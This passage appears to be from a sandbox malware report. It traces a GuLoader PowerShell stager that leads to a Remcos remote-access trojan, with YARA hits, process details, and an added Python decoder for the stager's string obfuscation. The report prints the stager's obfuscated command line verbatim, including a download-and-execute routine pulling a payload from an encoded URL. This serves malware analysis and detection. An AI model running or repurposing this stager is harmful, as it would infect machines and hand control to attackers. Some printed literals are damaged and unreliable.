rhT.inowineoAft p darEDr arB rgS');Forvanskende (Astroite 'Arc.$.olegBetalNa no ansbRecaaudsalNigr:F coG Blol CloaUnsusBeskpKalvuStadsSkrptT ykeNoddrOcelnBindeTi.m samm=Mis Ti b[La,oSErhvyMosts,midt OrieParcmAd p.KvadCExpeoUordn tomvRec eTrafrsty tSkud]mine:U,fo: SogFSel rLynioBoatmExtrBJaf aP itsV jkel xe6Hem 4LikeSChatt alarMedliLimbnActigM rl(Firm$HalviA.dedTrice ccp Seno apsssca eForbrGeop)');Forvanskende (Astroite 'Spat$nordGEvanlHowsoR asbPeroAUni l Gre: NotAKontd IndEfilbN.mpoo SveideceDGlu IFlu,stuneM gri Exe,= ttt Ga.e[EbliSKrityAdelS D.aT Y.geH rrM A l.CagptI dgEChemXUnclTSe i.InvoeMargn InvCTrkko SaxDMattISystnBordG on] Tea:Abol:Ung.aSsatS Il CAutoiPe,siLexi.SterGTa eERa eTSubcs gi TJokeRBathI nthNSkylGOper( np$QuaiG H sLBageadexisTrinPTrb,UAd,eSAs nt UndEGalaRFoliNadskE W n)');Forvanskende (Astroite 'Bill$SmedgTurnL FulosmutB Reia.etrLScro: YppiCakiNS euTNonteAlburfornIMermmglebsKunsBFortePoseV musiRec,SOrneE,overItalSBrig= Run$PinoaCorodStraERekon regoLni IIdy D G diSpuls HetM F r.MennsHjrnuRehybUnp sUnfoTE rir Musi StoNbeskGA ay(Barm$SptmDUforRE,teSSandlArbeaExeng M,lEBe knSkilELukkSIden,Iceb$ AnonInteAAfbeTItyluSub rStudaU palAfv.I RomSSejlEP,tarPosiItr pNCe tgEnt,EMagyRUnag)');Forvanskende $interimsbevisers;"
                                                  Imagebase:0x7ff760310000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1538011083.00000248688D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:02:29:25
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f010000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:02:29:41
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. 
CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . 
enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJoseaS ilsQuesetoup] U b= de $ProtAPrv.dMa nkKontoShorm Gu.s L,gtFa thtolkaCemevIlteeUnder C.se Altn');$Noncorruptible=Astroite 'Demo$Sv.rDReraiSpejfA enf EkseFussr gnaeLexinMetatA teiHou aAfsk.Rea.DSpr oLejewInapnDa,blDi qoCowhaSentdDe,aFOptnitotalDefoe,ami(Exoc$Phr,AtheoaFestnGenndT hosGentaSpolrHjlpi rtesSkumttairoLinak athr EmoaW ittLtgbe defnMedhs Yoy,Prob$ RekWFor hHa voMutoo Ga,p,keleHumrrvanis ,yd)';$Whoopers=$Cissel;Forvanskende (Astroite 'R se$Ma igPus ltocho SlgB esa RokLSpl,:Avi e BerM GodA raklKla JStadR Po eCamaRIdylnAtmoeLeas=Indr(EnfetPer e BraSKolltUopd- Gh pForea U,lt PriH Res Cor,$Tot.w PenhIsocOInteodaispDi sEBigaRCholsDugd)');while (!$Emaljrerne) {Forvanskende (Astroite 'Cond$Aracg,edelProjo .ocbGiftaLaurlRigs: Tand HypeSubiuTe,rtP rkeCoatrRdesoB ffeFly lFyraa Va.ssprntNonpo C msA soeOldd=.loa$LystT.urneStabkSpndsFamitVealaUb snChonmDatarun ekSrsknEmb,icelen SkigSprgeIns.nAtoms') ;Forvanskende $Noncorruptible;Forvanskende (Astroite 'Tr.kSSunnTF ssaPar RBlotTSumm-F.gmsV olLPer,eBemaeIndiP Kam Indf4');Forvanskende (Astroite 'Pr,s$AarsGEftelAfshOKalob MulaBunklFo.k:carpEencoMDecyaC tolNonlJKandrBetaeVerdrRisin ExcEDamp=Para(DipatTr feWarrsInviTKlap- WeipUnspABr,lTDkfaH irs Omkl$Gr sW d ahPateOH fto ufPSepaEKde rForfSRick)') ;Forvanskende (Astroite 'Prof$Sol.g ExtLs dhOAra BSommABaluLPlad: nsF reco .slLareodJ.wsESamodPalmRGlooSHemm=Qua.$ oligradiLSkabOord bKaboARaptLPdag:CultePersA,emiSIndiTColuEElecdAnch+Unmi+Anoi% esu$Pantg nfiRSlutaC,tem nbeMAm.ho.ietfsquao Ch NmaniENy iRDis sGe n.AmniC SploHonoU BrenAntiT') ;$Aandsaristokratens=$Grammofoners[$Foldedrs]}$Drslagenes=312252;$Naturaliseringer=30375;Forvanskende (Astroite ' Cap$fo sgEfteLhyd oSh iBUdenA ColLOtte:TerrI remDUdbiEForhp De oBrndSOgleEN,nvrlame La t=Inte Paneg C ae Dists ld-Ro tCKonsoPodoNGynoTIndkELuthn SnetT ed Ind$ForsWbo 
rhT.inowineoAft p darEDr arB rgS');Forvanskende (Astroite 'Arc.$.olegBetalNa no ansbRecaaudsalNigr:F coG Blol CloaUnsusBeskpKalvuStadsSkrptT ykeNoddrOcelnBindeTi.m samm=Mis Ti b[La,oSErhvyMosts,midt OrieParcmAd p.KvadCExpeoUordn tomvRec eTrafrsty tSkud]mine:U,fo: SogFSel rLynioBoatmExtrBJaf aP itsV jkel xe6Hem 4LikeSChatt alarMedliLimbnActigM rl(Firm$HalviA.dedTrice ccp Seno apsssca eForbrGeop)');Forvanskende (Astroite 'Spat$nordGEvanlHowsoR asbPeroAUni l Gre: NotAKontd IndEfilbN.mpoo SveideceDGlu IFlu,stuneM gri Exe,= ttt Ga.e[EbliSKrityAdelS D.aT Y.geH rrM A l.CagptI dgEChemXUnclTSe i.InvoeMargn InvCTrkko SaxDMattISystnBordG on] Tea:Abol:Ung.aSsatS Il CAutoiPe,siLexi.SterGTa eERa eTSubcs gi TJokeRBathI nthNSkylGOper( np$QuaiG H sLBageadexisTrinPTrb,UAd,eSAs nt UndEGalaRFoliNadskE W n)');Forvanskende (Astroite 'Bill$SmedgTurnL FulosmutB Reia.etrLScro: YppiCakiNS euTNonteAlburfornIMermmglebsKunsBFortePoseV musiRec,SOrneE,overItalSBrig= Run$PinoaCorodStraERekon regoLni IIdy D G diSpuls HetM F r.MennsHjrnuRehybUnp sUnfoTE rir Musi StoNbeskGA ay(Barm$SptmDUforRE,teSSandlArbeaExeng M,lEBe knSkilELukkSIden,Iceb$ AnonInteAAfbeTItyluSub rStudaU palAfv.I RomSSejlEP,tarPosiItr pNCe tgEnt,EMagyRUnag)');Forvanskende $interimsbevisers;"
                                                  Imagebase:0x40000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1748100726.0000000008700000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1748291655.000000000994F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.1728698519.0000000005995000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true
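The powershell.exe command line shown for Target ID 5 (the fragment at the top of this section is the tail of the same script, run by the earlier powershell.exe process) uses one string obfuscation throughout: the `Astroite` function starts at index 4 and keeps every fifth character of its argument, so each real character is preceded by four junk characters, and `Forvanskende` feeds the result to `iEx` (Invoke-Expression), itself recovered from the literal 'Hulli BonEBat.x'. The Python below is an added example, not part of the report or of the sample: it reimplements that routine, pulls `Astroite '...'` arguments out of a command line with a regular expression of my own, and flags literals whose length is not a multiple of five (my heuristic, based on the obfuscator emitting whole five-character groups). That check matters here: the report renders the command line as HTML, which collapses runs of spaces, so some literals on this page (the 24-character one assigned to `$knippelgodes`, for example) no longer decode correctly. Run the decoder against the raw command line from process-creation telemetry (Sysmon Event ID 1 or Security 4688) to recover everything, including the download URL held in `$Aandsaristokratens`.

```python
"""Decoder for the string obfuscation used by the powershell.exe stager above.

Added example for this report, not code from the sample or from Joe Sandbox.
The stager's Astroite function keeps every 5th character of its argument,
starting at index 4; Forvanskende passes the result to iEx (Invoke-Expression).
Runs offline on literals copied from the command line shown for Target ID 5.
"""
import re

STRIDE = 5        # $Racketlike+=5
FIRST_INDEX = 4   # $Spildendes=4

# Literals copied verbatim from the command line above (single-quoted
# arguments of Astroite). The last one is 24 characters long: the report
# renders the command line as HTML, which collapses runs of spaces, so at
# least one character of that literal was lost before it reached the page.
SAMPLES = {
    "criminologist": "Hulli BonEBat.x",
    "Redefinerende_1": "vascnVer,e roeT Oto.UhyrW",
    "Redefinerende_2": "charEmel,B Si,CAnetL skiIbreceFeltNK.ont",
    "Adkomsthaveren_prefix": "ChepMUnwooK lizRangiLattlst nl Cena Pom/",
    "Racketlikenddateringsfase": " .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT",
    "Aandsaristokratens": (
        "DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h."
        "KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/"
        " RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl"
        " Como enzy"
    ),
    "knippelgodes": " nkT Es lLei s Vit1Plat2",
}


def astroite(encoded: str) -> str:
    """Reproduce Astroite: the characters at index 4, 9, 14, ... in order."""
    return encoded[FIRST_INDEX::STRIDE]


def looks_intact(encoded: str) -> bool:
    """Heuristic (mine, not the script's): the obfuscator emits whole
    5-character groups, so a length that is not a multiple of 5 means the
    literal was truncated or had whitespace collapsed in transit."""
    return bool(encoded) and len(encoded) % STRIDE == 0


# Pattern (mine) for Astroite '...' arguments; '' is an escaped quote inside
# a PowerShell single-quoted string.
ASTROITE_CALL = re.compile(r"Astroite\s+'((?:[^']|'')*)'")


def decode_command_line(cmd: str) -> list[dict]:
    """Decode every Astroite '...' literal found in a PowerShell command line.

    Each entry carries the encoded text, its decoding, and whether the length
    check passed; a False flag means the decoding cannot be trusted."""
    results = []
    for m in ASTROITE_CALL.finditer(cmd):
        enc = m.group(1).replace("''", "'")
        results.append({"encoded": enc, "decoded": astroite(enc),
                        "intact": looks_intact(enc)})
    return results


def decode_samples() -> dict:
    """Decode the copied literals; the pair the script joins with += is joined."""
    out = {name: astroite(enc) for name, enc in SAMPLES.items()}
    out["Redefinerende"] = out.pop("Redefinerende_1") + out.pop("Redefinerende_2")
    return out


if __name__ == "__main__":
    for name, enc in SAMPLES.items():
        flag = "" if looks_intact(enc) else "  <-- length not a multiple of 5, damaged"
        print(f"{name:26s} {astroite(enc)!r}{flag}")
```

Decoding the intact literals gives `iEx`, `neT.WEBCLIeNt`, `Mozilla/`, `USeR-aGenT` and the URL the loop retries until `Test-Path` succeeds, which is why case-insensitive matching is needed when pivoting on the recovered tokens. The `$knippelgodes` literal is flagged rather than decoded, because its rendered form has lost a space and yields garbage.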

                                                  Target ID:6
                                                  Start time:02:29:41
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f010000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:02:30:02
                                                  Start date:17/12/2024
                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                  Imagebase:0xfc0000
                                                  File size:59'904 bytes
                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f12f451b10806d195183d6334858e3a0637db2730c6ff9989dd7f7aae4a3fff3
                                                    • Instruction ID: 7c17cc7f24f4cf0f250e8cc9b7c4e98d7ffd0a55d50445dabc0adabd72793cf5
                                                    • Opcode Fuzzy Hash: f12f451b10806d195183d6334858e3a0637db2730c6ff9989dd7f7aae4a3fff3
                                                    • Instruction Fuzzy Hash: 68F19030918A8D8FEBA8DF28C8557E977D1FF54350F04427AE84EC7296DA799841CB82
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a742018fadfc0f1d8cfeb862c3b3e442355867539e21e1facc914cad8398a017
                                                    • Instruction ID: d68c5b05c274732659b36ceb636233b9eedf74a71427e006b18b3ee44a21cb7c
                                                    • Opcode Fuzzy Hash: a742018fadfc0f1d8cfeb862c3b3e442355867539e21e1facc914cad8398a017
                                                    • Instruction Fuzzy Hash: E9E1A13090CA4E8FEBA8DF28C8567E977D2FB54350F14427AD84EC7295DE799841CB82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A_H
                                                    • API String ID: 0-522415800
                                                    • Opcode ID: be9a651648beccae31fbdd0a5923e2c93c59b69bad2be33a59b5ea0dc1e39aed
                                                    • Instruction ID: 00be6cc042d629ed270be27a0290b45ea7c6ed73ec0091f01ffa417efd2899df
                                                    • Opcode Fuzzy Hash: be9a651648beccae31fbdd0a5923e2c93c59b69bad2be33a59b5ea0dc1e39aed
                                                    • Instruction Fuzzy Hash: CBB13621D0EACA4FE7A7AB6858552B57BE1FF5A390B4801FAC04EC71D3DD0AAC15C342
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f07b793b92236c8e7527fcdf8b1df073dd4238bb09884755703776f860086ea6
                                                    • Instruction ID: 42d965418919e49c2ea818ade350bd70ebffd6d1728aef75244aa0737cdf5ad4
                                                    • Opcode Fuzzy Hash: f07b793b92236c8e7527fcdf8b1df073dd4238bb09884755703776f860086ea6
                                                    • Instruction Fuzzy Hash: 2A42A130A18A498FDB98EF5CD495AE977E1FF98350F14017AD40AD7286CF35AC41CB82
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8def6900fbe1baebaf511a36c72c4500ae6c859b5f9f60dd0491ee8c06ef92e1
                                                    • Instruction ID: f2e27fbce396e1cfc97590e93f2cc1ac265fe0b4b3bf3b7b97c23b3240a1b8f4
                                                    • Opcode Fuzzy Hash: 8def6900fbe1baebaf511a36c72c4500ae6c859b5f9f60dd0491ee8c06ef92e1
                                                    • Instruction Fuzzy Hash: 77C1E722E0DA894FE796EA6858546757FE1FF56690B0901FAC04ECF1D3DE1BAC05C342
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86f70fbe318194bceb212a8e2bb28465aa7120501dfdd3f530c7b707c055c372
                                                    • Instruction ID: 2f1238b3b69ef19cf5f67d44c64b679b753a4abeea635082479aa68135c3babd
                                                    • Opcode Fuzzy Hash: 86f70fbe318194bceb212a8e2bb28465aa7120501dfdd3f530c7b707c055c372
                                                    • Instruction Fuzzy Hash: 5DA11521E0DA8A4FE7E9AA6C58552B53BD1FF562A4F4801BED04FC31D3ED1AAC15C342
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550018590.00007FF886D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886d00000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dac8ee0351d2dd46b41127e12c279359e7e98ae1a5a2240d9d97f6f2499e5649
                                                    • Instruction ID: da331da0fd14b749a47d323e08e14c94b6e2790b3be30ef8dd9e9d0619c569a7
                                                    • Opcode Fuzzy Hash: dac8ee0351d2dd46b41127e12c279359e7e98ae1a5a2240d9d97f6f2499e5649
                                                    • Instruction Fuzzy Hash: 4AB1A23091CA8D8FEB68DF2898557E93BD1FF55350F04427EE84EC7292CA799845CB82
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 24be52564693d6a883793751d84cc17e50e13051b38105c91c356ba4fb1aa4ef
                                                    • Instruction ID: 9a996b56ab8a8d94a39795430d2ed2302d57d2d275b5a67c5d8c99d6d422e70f
                                                    • Opcode Fuzzy Hash: 24be52564693d6a883793751d84cc17e50e13051b38105c91c356ba4fb1aa4ef
                                                    • Instruction Fuzzy Hash: 4C61F72190E7C54FD762AB6898506A57FF1FF56250B0D41FBD489CB0E3CA19AC09C392
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a23b1a247f60ae56c90b58ddd8c509b3dcff7678165876aca2cf4c9499acefb
                                                    • Instruction ID: 24147f7b93b23bd18c918ab46bcdd4a30c416e9a4a3f0ecef1e9837e9b4a2cc2
                                                    • Opcode Fuzzy Hash: 0a23b1a247f60ae56c90b58ddd8c509b3dcff7678165876aca2cf4c9499acefb
                                                    • Instruction Fuzzy Hash: A551F232E0CB854FE755EA6898552B8BBE1FF56360F0841BAC04E871D3DE296C46C742
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11a816bd8cfa5ddf75545de4efa6c52c2eab1ead1f253613b75bba4b016a9b24
                                                    • Instruction ID: bea5a35c43190ed6c0488b5d2acb7e023c25068bdf39375b038f76197310f81d
                                                    • Opcode Fuzzy Hash: 11a816bd8cfa5ddf75545de4efa6c52c2eab1ead1f253613b75bba4b016a9b24
                                                    • Instruction Fuzzy Hash: 8751F132E0DBC54FE759EA6898552B8BBE1FF56760F0841BEC04E87183DE296C46C742
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0462896770d9315727b44f0df2493023883dbbfacfc51a542a01e7d1012f66eb
                                                    • Instruction ID: 9e24e85219be070b50aea3212dd6ce5950543d66d64f1c7e3ea00715b31209a1
                                                    • Opcode Fuzzy Hash: 0462896770d9315727b44f0df2493023883dbbfacfc51a542a01e7d1012f66eb
                                                    • Instruction Fuzzy Hash: C651F332E0DB854FE755EA6888552B8BBE1FF55790F1801FED04E87183DE2AAC49C742
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f86c0cb3561815746fc4ada29973b46ce96d1872f81cb0bf134995a301f59d18
                                                    • Instruction ID: 820548788487edcc289a86c5ed5c5597fd7427cc393c3855fa8abfc4173ddd27
                                                    • Opcode Fuzzy Hash: f86c0cb3561815746fc4ada29973b46ce96d1872f81cb0bf134995a301f59d18
                                                    • Instruction Fuzzy Hash: FD510132E0DB854FE755EB6888552B8BBE1FF55660F1801FEC04E8B1D3CA2AAC45C302
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f7b15becc451803b6abe19d2909acfbe21814899fe0c0ec6bbdf5f7d152829f8
                                                    • Instruction ID: 2b5800024cf795190c4997daf2b90e15464b053aadbc5ea00d414b8270cbf1a0
                                                    • Opcode Fuzzy Hash: f7b15becc451803b6abe19d2909acfbe21814899fe0c0ec6bbdf5f7d152829f8
                                                    • Instruction Fuzzy Hash: D441D422D0DBC94FE756EA6848945757FE0FF56250B0901FAD08ECF1A3CA1A6C09C352
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1550514367.00007FF886DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886DD0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff886dd0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5cd60232c0d18f4766e65c8cfcef99e66f2af541c55f82d4af9e9bb617095c91
                                                    • Instruction ID: 7002b56c120c16a0f11cfdec7397a4876d7c025fb8d299cb27c3de1fa7fb1d88
                                                    • Opcode Fuzzy Hash: 5cd60232c0d18f4766e65c8cfcef99e66f2af541c55f82d4af9e9bb617095c91
                                                    • Instruction Fuzzy Hash: 77A14D70E00209CFDB10CFA9D9857EEBBF1AF89714F148529D814EB354EB75A885CB91
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1742742377.0000000007430000.00000040.00000800.00020000.00000000.sdmp, Offset: 07430000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7430000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87c9390967e4440159b17b4d1c1f449c3931814ad0e38553d3d3f1e9fce0c4f8
                                                    • Instruction ID: c7e2140d7958e645a26989fb4a3d2fd1d1d9f8fc41df1051af4381181caa4005
